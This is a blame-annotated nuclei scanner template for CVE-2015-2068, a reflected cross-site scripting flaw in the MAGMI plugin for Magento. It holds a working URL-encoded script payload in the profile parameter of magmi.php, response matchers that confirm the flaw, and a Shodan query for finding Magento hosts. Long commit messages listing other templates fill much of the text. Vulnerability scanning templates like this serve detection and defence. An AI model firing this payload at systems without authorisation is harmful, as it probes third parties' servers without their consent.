nuclei-templates/cves/2015/CVE-2015-2068.yaml

39 lines
1.2 KiB
YAML
Raw Normal View History

2021-10-11 12:05:38 +00:00
id: CVE-2015-2068
2021-10-11 11:28:08 +00:00
info:
name: Magento Server Magmi Plugin - Cross Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
2021-10-11 11:28:08 +00:00
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
- http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
Dashboard Content Enhancement (#4020) * Enhancement: cnvd/2021/CNVD-2021-15822.yaml by mp * Enhancement: exposed-panels/apache/tomcat-pathnormalization.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: exposed-panels/apiman-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: exposed-panels/arcgis/arcgis-panel.yaml by mp * Enhancement: exposed-panels/arcgis/arcgis-rest-api.yaml by mp * Enhancement: exposed-panels/argocd-login.yaml by mp * Enhancement: exposed-panels/atlassian-crowd-panel.yaml by mp * Enhancement: exposed-panels/atvise-login.yaml by mp * Enhancement: exposed-panels/avantfax-panel.yaml by mp * Enhancement: exposed-panels/avatier-password-management.yaml by mp * Enhancement: exposed-panels/axigen-webadmin.yaml by mp * Enhancement: exposed-panels/axigen-webmail.yaml by mp * Enhancement: exposed-panels/azkaban-web-client.yaml by mp * Enhancement: exposed-panels/acunetix-panel.yaml by mp * Enhancement: exposed-panels/adiscon-loganalyzer.yaml by mp * Enhancement: exposed-panels/adminer-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: exposed-panels/adminset-panel.yaml by mp * Enhancement: exposed-panels/adobe/adobe-component-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-connect-central-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-experience-manager-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-media-server.yaml by mp * Enhancement: exposed-panels/advance-setup.yaml by mp * Enhancement: exposed-panels/aerohive-netconfig-ui.yaml by mp * Enhancement: exposed-panels/aims-password-mgmt-client.yaml by mp * Enhancement: exposed-panels/aims-password-mgmt-client.yaml by mp * Enhancement: exposed-panels/aims-password-portal.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * spacing issues * Spacing * HTML codes improperly interpreted Relocate horde-unauthenticated.yaml to CVE-2005-3344.yaml * Relocate horde-unauthenticated.yaml to CVE-2005-3344.yaml * Enhancement: technologies/waf-detect.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: network/sap-router-info-leak.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: network/sap-router-info-leak.yaml by mp * Enhancement: network/exposed-adb.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml by mp * Enhancement: exposures/tokens/digitalocean/tugboat-config-exposure.yaml by mp * Enhancement: exposed-panels/concrete5/concrete5-install.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml by mp * indentation issue * Character encoding issue fix * Enhancement: default-logins/alibaba/canal-default-login.yaml by mp * Enhancement: default-logins/alphaweb/alphaweb-default-login.yaml by mp * Enhancement: default-logins/ambari/ambari-default-login.yaml by mp * Enhancement: default-logins/apache/airflow-default-login.yaml by mp * Enhancement: default-logins/apache/apisix-default-login.yaml by mp * Enhancement: default-logins/apollo/apollo-default-login.yaml by mp * Enhancement: default-logins/arl/arl-default-login.yaml by mp * Enhancement: default-logins/digitalrebar/digitalrebar-default-login.yaml by mp * Enhancement: default-logins/mantisbt/mantisbt-default-credential.yaml by mp * Enhancement: default-logins/stackstorm/stackstorm-default-login.yaml by mp * Enhancement: dns/caa-fingerprint.yaml by mp * Enhancement: exposed-panels/active-admin-exposure.yaml by mp * Enhancement: exposed-panels/activemq-panel.yaml by mp * Enhancement: default-logins/ambari/ambari-default-login.yaml by mp * Restore & stomped by dashboard * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2021/CVE-2021-38751.yaml by mp * Enhancement: cves/2021/CVE-2021-39320.yaml by mp * Enhancement: cves/2021/CVE-2021-39322.yaml by mp * Enhancement: cves/2021/CVE-2021-39327.yaml by mp * Enhancement: cves/2021/CVE-2021-39350.yaml by mp * Enhancement: cves/2021/CVE-2021-39433.yaml by mp * Enhancement: cves/2021/CVE-2021-41192.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-15824.yaml by mp * Enhancement: exposed-panels/ansible-semaphore-panel.yaml by mp * Enhancement: exposed-panels/aviatrix-panel.yaml by mp * Enhancement: cves/2022/CVE-2022-24288.yaml by mp * Enhancement: cves/2022/CVE-2022-24990.yaml by mp * Enhancement: cves/2022/CVE-2022-26159.yaml by mp * Enhancement: default-logins/aem/aem-default-login.yaml by mp * Enhancement: exposed-panels/blue-iris-login.yaml by mp * Enhancement: exposed-panels/bigbluebutton-login.yaml by mp * Enhancement: cves/2022/CVE-2022-24288.yaml by mp * Enhancement: cves/2022/CVE-2022-24990.yaml by mp * Enhancement: cves/2022/CVE-2022-26159.yaml by mp * Enhancement: default-logins/aem/aem-default-login.yaml by mp * Spacing issues Add cve-id field * fix & stomping * Enhancement: cves/2016/CVE-2016-1000141.yaml by mp * Enhancement: cves/2020/CVE-2020-24912.yaml by mp * Enhancement: cves/2021/CVE-2021-35265.yaml by mp * Enhancement: cves/2022/CVE-2022-0437.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: technologies/teradici-pcoip.yaml by mp * Enhancement: vulnerabilities/other/unauth-hoteldruid-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: exposed-panels/epson-web-control-detect.yaml by mp * Enhancement: exposed-panels/epson-access-detect.yaml by mp * Enhancement: cves/2020/CVE-2020-29453.yaml by mp * Fix spacing * Remove empty cve lines and relocate tags * Remove blank cve lines & move tags * Fix merge errors * Enhancement: cves/2020/CVE-2020-21224.yaml by mp * Enhancement: cves/2020/CVE-2020-24148.yaml by mp * Enhancement: cves/2020/CVE-2020-24391.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: cves/2020/CVE-2020-25213.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-25506.yaml by mp * Enhancement: cves/2020/CVE-2020-2551.yaml by mp * Enhancement: cves/2020/CVE-2020-28871.yaml by mp * Enhancement: cves/2020/CVE-2020-28188.yaml by mp * Enhancement: cves/2020/CVE-2020-26948.yaml by mp * Enhancement: cves/2020/CVE-2020-26919.yaml by mp * Enhancement: cves/2020/CVE-2020-26214.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-21224.yaml by mp * Enhancement: cves/2020/CVE-2020-24148.yaml by mp * Enhancement: cves/2020/CVE-2020-24186.yaml by mp * Enhancement: cves/2020/CVE-2020-24186.yaml by mp * Enhancement: cves/2020/CVE-2020-24391.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: cves/2020/CVE-2020-25213.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-25506.yaml by mp * Enhancement: cves/2020/CVE-2020-28871.yaml by mp * Enhancement: cves/2020/CVE-2020-28188.yaml by mp * Enhancement: cves/2020/CVE-2020-26948.yaml by mp * Enhancement: cves/2020/CVE-2020-26919.yaml by mp * Enhancement: cves/2020/CVE-2020-26214.yaml by mp * Syntax cleanup * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Syntax and a title change * Enhancement: cves/2021/CVE-2021-38702.yaml by mp * Fix references * Enhancement: cves/2021/CVE-2021-38704.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-44529.yaml by mp * Conflicts resolved * Fix quoting * Enhancement: cves/2021/CVE-2021-45967.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cves/2022/CVE-2022-23779.yaml by mp * Enhancement: default-logins/apache/dolphinscheduler-default-login.yaml by mp * Enhancement: default-logins/cobbler/hue-default-credential.yaml by mp * Enhancement: default-logins/emqx/emqx-default-login.yaml by mp * Enhancement: default-logins/geoserver/geoserver-default-login.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-45967.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-14536.yaml by mp * Enhancement: default-logins/apache/dolphinscheduler-default-login.yaml by mp * Enhancement: default-logins/geoserver/geoserver-default-login.yaml by mp * Update CVE-2020-25223.yaml * Update CVE-2020-26214.yaml * Update CVE-2020-25506.yaml * Update CVE-2020-2551.yaml * Update CVE-2020-26919.yaml * Update CVE-2021-44529.yaml * Update CVE-2020-28871.yaml * Update CVE-2020-28188.yaml * Update CVE-2021-45967.yaml * Update hue-default-credential.yaml * Update CVE-2021-44529.yaml * misc syntax update * Syntax restore some characters * Spacing * Enhancement: vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml by mp * Enhancement: vulnerabilities/wordpress/issuu-panel-lfi.yaml by mp * Enhancement: cves/2019/CVE-2019-10068.yaml by mp * Enhancement: cves/2019/CVE-2019-10232.yaml by mp * Enhancement: cves/2019/CVE-2019-10758.yaml by mp * Enhancement: cves/2019/CVE-2019-11510.yaml by mp * Enhancement: cves/2019/CVE-2019-11580.yaml by mp * Enhancement: cves/2019/CVE-2019-11581.yaml by mp * Enhancement: cves/2019/CVE-2019-12314.yaml by mp * Enhancement: cves/2019/CVE-2019-13101.yaml by mp * Link wrapping issue * Enhancement: cves/2019/CVE-2019-13462.yaml by mp * Enhancement: cves/2019/CVE-2019-15107.yaml by mp * Enhancement: cves/2019/CVE-2019-15859.yaml by mp * Enhancement: cves/2019/CVE-2019-16759.yaml by mp * Enhancement: cves/2019/CVE-2019-16662.yaml by mp * Enhancement: cves/2019/CVE-2019-16278.yaml by mp * Enhancement: cves/2019/CVE-2019-10232.yaml by mp * Enhancement: cves/2019/CVE-2019-10758.yaml by mp * Enhancement: cves/2019/CVE-2019-11510.yaml by mp * Enhancement: cves/2019/CVE-2019-12725.yaml by mp * Enhancement: cves/2019/CVE-2019-13101.yaml by mp * Enhancement: cves/2019/CVE-2019-15107.yaml by mp * Enhancement: cves/2019/CVE-2019-15859.yaml by mp * Enhancement: cves/2019/CVE-2019-16662.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-10543.yaml by cs * Enhancement: cves/2021/CVE-2021-33807.yaml by mp * Enhancement: cves/2010/CVE-2010-0943.yaml by mp * Enhancement: cves/2008/CVE-2008-6172.yaml by mp * Enhancement: vulnerabilities/simplecrm/simple-crm-sql-injection.yaml by mp * Enhancement: vulnerabilities/oracle/oracle-siebel-xss.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: network/cisco-smi-exposure.yaml by mp * Enhancement: cves/2021/CVE-2021-37704.yaml by mp * Enhancement: vulnerabilities/other/microweber-xss.yaml by mp * Enhancement: cves/2019/CVE-2019-16313.yaml by mp * Enhancement: cves/2021/CVE-2021-3017.yaml by mp * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-5278.yaml by mp * Enhancement: cves/2021/CVE-2021-37573.yaml by mp * Enhancement: vulnerabilities/oracle/oracle-siebel-xss.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: vulnerabilities/other/microweber-xss.yaml by mp * Enhancement: cves/2018/CVE-2018-11709.yaml by mp * Enhancement: cves/2014/CVE-2014-2321.yaml by mp * Enhancement: vulnerabilities/other/visual-tools-dvr-rce.yaml by mp * Enhancement: vulnerabilities/other/visual-tools-dvr-rce.yaml by mp * Manual enhancement * Manual enhancement push due to dashboard failure * Testing of dashboard accidentally commited to dashboard branch * Spacing Put some CVEs in the classification * Add missing cve-id fields to templates in cve/ Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-04-01 08:51:42 +00:00
classification:
cve-id: CVE-2015-2068
2022-06-15 19:57:21 +00:00
metadata:
verified: true
shodan-query: http.component:"Magento"
Updated all templates tags with technologies (#3478) * Updated tags for template sonicwall-email-security-detect.yaml * Updated tags for template detect-sentry.yaml * Updated tags for template kong-detect.yaml * Updated tags for template openam-detect.yaml * Updated tags for template shiro-detect.yaml * Updated tags for template iplanet-web-server.yaml * Updated tags for template graylog-api-browser.yaml * Updated tags for template prtg-detect.yaml * Updated tags for template node-red-detect.yaml * Updated tags for template abyss-web-server.yaml * Updated tags for template geo-webserver.yaml * Updated tags for template autobahn-python-detect.yaml * Updated tags for template default-lighttpd-page.yaml * Updated tags for template microsoft-iis-8.yaml * Updated tags for template lucee-detect.yaml * Updated tags for template php-proxy-detect.yaml * Updated tags for template jenkins-detect.yaml * Updated tags for template cockpit-detect.yaml * Updated tags for template csrfguard-detect.yaml * Updated tags for template dwr-index-detect.yaml * Updated tags for template netsweeper-webadmin-detect.yaml * Updated tags for template weblogic-detect.yaml * Updated tags for template s3-detect.yaml * Updated tags for template tileserver-gl.yaml * Updated tags for template springboot-actuator.yaml * Updated tags for template terraform-detect.yaml * Updated tags for template redmine-cli-detect.yaml * Updated tags for template mrtg-detect.yaml * Updated tags for template tableau-server-detect.yaml * Updated tags for template magmi-detect.yaml * Updated tags for template oidc-detect.yaml * Updated tags for template tor-socks-proxy.yaml * Updated tags for template synology-web-station.yaml * Updated tags for template herokuapp-detect.yaml * Updated tags for template gunicorn-detect.yaml * Updated tags for template sql-server-reporting.yaml * Updated tags for template google-bucket-service.yaml * Updated tags for template kubernetes-mirantis.yaml * Updated tags for template kubernetes-enterprise-manager.yaml * Updated tags for template oracle-iplanet-web-server.yaml * Updated tags for template dell-idrac7-detect.yaml * Updated tags for template dell-idrac6-detect.yaml * Updated tags for template dell-idrac9-detect.yaml * Updated tags for template dell-idrac8-detect.yaml * Updated tags for template apache-guacamole.yaml * Updated tags for template aws-cloudfront-service.yaml * Updated tags for template aws-bucket-service.yaml * Updated tags for template nginx-linux-page.yaml * Updated tags for template telerik-fileupload-detect.yaml * Updated tags for template telerik-dialoghandler-detect.yaml * Updated tags for template htaccess-config.yaml * Updated tags for template microsoft-azure-error.yaml * Updated tags for template detect-options-method.yaml * Updated tags for template unpatched-coldfusion.yaml * Updated tags for template moodle-changelog.yaml * Updated tags for template detect-dns-over-https.yaml * Updated tags for template CVE-2019-19134.yaml * Updated tags for template CVE-2019-3929.yaml * Updated tags for template CVE-2019-19908.yaml * Updated tags for template CVE-2019-10475.yaml * Updated tags for template CVE-2019-17382.yaml * Updated tags for template CVE-2019-16332.yaml * Updated tags for template CVE-2019-14974.yaml * Updated tags for template CVE-2019-19368.yaml * Updated tags for template CVE-2019-12725.yaml * Updated tags for template CVE-2019-15501.yaml * Updated tags for template CVE-2019-9733.yaml * Updated tags for template CVE-2019-14322.yaml * Updated tags for template CVE-2019-9955.yaml * Updated tags for template CVE-2019-0230.yaml * Updated tags for template CVE-2019-10232.yaml * Updated tags for template CVE-2019-17506.yaml * Updated tags for template CVE-2019-8449.yaml * Updated tags for template CVE-2019-12593.yaml * Updated tags for template CVE-2019-10092.yaml * Updated tags for template CVE-2019-1821.yaml * Updated tags for template CVE-2019-3401.yaml * Updated tags for template CVE-2019-16662.yaml * Updated tags for template CVE-2019-5418.yaml * Updated tags for template CVE-2016-4975.yaml * Updated tags for template CVE-2016-1000137.yaml * Updated tags for template CVE-2016-7552.yaml * Updated tags for template CVE-2016-10956.yaml * Updated tags for template CVE-2016-1000146.yaml * Updated tags for template CVE-2013-2251.yaml * Updated tags for template CVE-2013-1965.yaml * Updated tags for template CVE-2014-2323.yaml * Updated tags for template CVE-2014-5111.yaml * Updated tags for template CVE-2014-2962.yaml * Updated tags for template CVE-2014-4561.yaml * Updated tags for template CVE-2014-4558.yaml * Updated tags for template CVE-2014-3120.yaml * Updated tags for template CVE-2007-5728.yaml * Updated tags for template CVE-2009-4679.yaml * Updated tags for template CVE-2009-1558.yaml * Updated tags for template CVE-2009-4202.yaml * Updated tags for template CVE-2009-0932.yaml * Updated tags for template CVE-2015-2068.yaml * Updated tags for template CVE-2015-8813.yaml * Updated tags for template CVE-2015-7450.yaml * Updated tags for template CVE-2015-2067.yaml * Updated tags for template CVE-2015-3306.yaml * Updated tags for template CVE-2015-3337.yaml * Updated tags for template CVE-2015-1427.yaml * Updated tags for template CVE-2015-1503.yaml * Updated tags for template CVE-2015-1880.yaml * Updated tags for template CVE-2018-3810.yaml * Updated tags for template CVE-2018-18069.yaml * Updated tags for template CVE-2018-17246.yaml * Updated tags for template CVE-2018-10141.yaml * Updated tags for template CVE-2018-16341.yaml * Updated tags for template CVE-2018-18777.yaml * Updated tags for template CVE-2018-15138.yaml * Updated tags for template CVE-2018-11784.yaml * Updated tags for template CVE-2018-16299.yaml * Updated tags for template CVE-2018-7251.yaml * Updated tags for template CVE-2018-1273.yaml * Updated tags for template CVE-2018-1271.yaml * Updated tags for template CVE-2018-11759.yaml * Updated tags for template CVE-2018-3167.yaml * Updated tags for template CVE-2018-7490.yaml * Updated tags for template CVE-2018-2628.yaml * Updated tags for template CVE-2018-13380.yaml * Updated tags for template CVE-2018-2893.yaml * Updated tags for template CVE-2018-5316.yaml * Updated tags for template CVE-2018-20985.yaml * Updated tags for template CVE-2018-10818.yaml * Updated tags for template CVE-2018-1000861.yaml * Updated tags for template CVE-2018-0296.yaml * Updated tags for template CVE-2018-19458.yaml * Updated tags for template CVE-2018-3760.yaml * Updated tags for template CVE-2018-12998.yaml * Updated tags for template CVE-2018-9118.yaml * Updated tags for template CVE-2018-1000130.yaml * Updated tags for template CVE-2008-6668.yaml * Updated tags for template CVE-2017-7269.yaml * Updated tags for template CVE-2017-1000170.yaml * Updated tags for template CVE-2017-16877.yaml * Updated tags for template CVE-2017-1000486.yaml * Updated tags for template CVE-2017-9822.yaml * Updated tags for template CVE-2017-0929.yaml * Updated tags for template CVE-2017-7921.yaml * Updated tags for template CVE-2017-14535.yaml * Updated tags for template CVE-2017-5521.yaml * Updated tags for template CVE-2017-12637.yaml * Updated tags for template CVE-2017-12635.yaml * Updated tags for template CVE-2017-11610.yaml * Updated tags for template CVE-2021-20114.yaml * Updated tags for template CVE-2021-40856.yaml * Updated tags for template CVE-2021-21972.yaml * Updated tags for template CVE-2021-31602.yaml * Updated tags for template CVE-2021-41773.yaml * Updated tags for template CVE-2021-37704.yaml * Updated tags for template CVE-2021-45046.yaml * Updated tags for template CVE-2021-26084.yaml * Updated tags for template CVE-2021-27931.yaml * Updated tags for template CVE-2021-24291.yaml * Updated tags for template CVE-2021-41648.yaml * Updated tags for template CVE-2021-37216.yaml * Updated tags for template CVE-2021-22005.yaml * Updated tags for template CVE-2021-37573.yaml * Updated tags for template CVE-2021-31755.yaml * Updated tags for template CVE-2021-43287.yaml * Updated tags for template CVE-2021-24274.yaml * Updated tags for template CVE-2021-33564.yaml * Updated tags for template CVE-2021-22145.yaml * Updated tags for template CVE-2021-24237.yaml * Updated tags for template CVE-2021-44848.yaml * Updated tags for template CVE-2021-25646.yaml * Updated tags for template CVE-2021-21816.yaml * Updated tags for template CVE-2021-41649.yaml * Updated tags for template CVE-2021-41291.yaml * Updated tags for template CVE-2021-41293.yaml * Updated tags for template CVE-2021-21801.yaml * Updated tags for template CVE-2021-29156.yaml * Updated tags for template CVE-2021-34370.yaml * Updated tags for template CVE-2021-27132.yaml * Updated tags for template CVE-2021-28151.yaml * Updated tags for template CVE-2021-26812.yaml * Updated tags for template CVE-2021-21985.yaml * Updated tags for template CVE-2021-43778.yaml * Updated tags for template CVE-2021-25281.yaml * Updated tags for template CVE-2021-40539.yaml * Updated tags for template CVE-2021-36749.yaml * Updated tags for template CVE-2021-21234.yaml * Updated tags for template CVE-2021-33221.yaml * Updated tags for template CVE-2021-42013.yaml * Updated tags for template CVE-2021-33807.yaml * Updated tags for template CVE-2021-44228.yaml * Updated tags for template CVE-2012-0896.yaml * Updated tags for template CVE-2012-0991.yaml * Updated tags for template CVE-2012-0392.yaml * Updated tags for template CVE-2012-4940.yaml * Updated tags for template CVE-2012-1226.yaml * Updated tags for template CVE-2012-4878.yaml * Updated tags for template CVE-2010-1304.yaml * Updated tags for template CVE-2010-1217.yaml * Updated tags for template CVE-2010-0759.yaml * Updated tags for template CVE-2010-2307.yaml * Updated tags for template CVE-2010-4231.yaml * Updated tags for template CVE-2010-2861.yaml * Updated tags for template CVE-2010-4282.yaml * Updated tags for template CVE-2010-1302.yaml * Updated tags for template CVE-2010-1461.yaml * Updated tags for template CVE-2020-4463.yaml * Updated tags for template CVE-2020-1943.yaml * Updated tags for template CVE-2020-36289.yaml * Updated tags for template CVE-2020-17518.yaml * Updated tags for template CVE-2020-12800.yaml * Updated tags for template CVE-2020-10770.yaml * Updated tags for template CVE-2020-17506.yaml * Updated tags for template CVE-2020-11547.yaml * Updated tags for template CVE-2020-11034.yaml * Updated tags for template CVE-2020-24589.yaml * Updated tags for template CVE-2020-9054.yaml * Updated tags for template CVE-2020-28976.yaml * Updated tags for template CVE-2020-16952.yaml * Updated tags for template CVE-2020-24312.yaml * Updated tags for template CVE-2020-8512.yaml * Updated tags for template CVE-2020-14179.yaml * Updated tags for template CVE-2020-6308.yaml * Updated tags for template CVE-2020-35846.yaml * Updated tags for template CVE-2020-7318.yaml * Updated tags for template CVE-2020-2140.yaml * Updated tags for template CVE-2020-5410.yaml * Updated tags for template CVE-2020-5777.yaml * Updated tags for template CVE-2020-13700.yaml * Updated tags for template CVE-2020-5775.yaml * Updated tags for template CVE-2020-13167.yaml * Updated tags for template CVE-2020-35848.yaml * Updated tags for template CVE-2020-9484.yaml * Updated tags for template CVE-2020-15505.yaml * Updated tags for template CVE-2020-9047.yaml * Updated tags for template CVE-2020-17519.yaml * Updated tags for template CVE-2020-17505.yaml * Updated tags for template CVE-2020-9376.yaml * Updated tags for template CVE-2020-8497.yaml * Updated tags for template CVE-2020-14092.yaml * Updated tags for template CVE-2020-10148.yaml * Updated tags for template CVE-2020-35847.yaml * Updated tags for template CVE-2020-12116.yaml * Updated tags for template CVE-2020-11930.yaml * Updated tags for template CVE-2020-24186.yaml * Updated tags for template CVE-2020-9496.yaml * Updated tags for template CVE-2020-35489.yaml * Updated tags for template CVE-2020-26413.yaml * Updated tags for template CVE-2020-2096.yaml * misc updates * misc update * more updates Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-01-04 19:34:16 +00:00
tags: cve,cve2015,magento,magmi,xss,plugin
2021-10-11 11:28:08 +00:00
requests:
- method: GET
path:
2021-10-11 12:02:29 +00:00
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-10-11 11:28:08 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2021-10-11 12:02:29 +00:00
- "</script><script>alert(document.domain)</script>"
2021-10-11 12:05:38 +00:00
2021-10-11 11:28:08 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200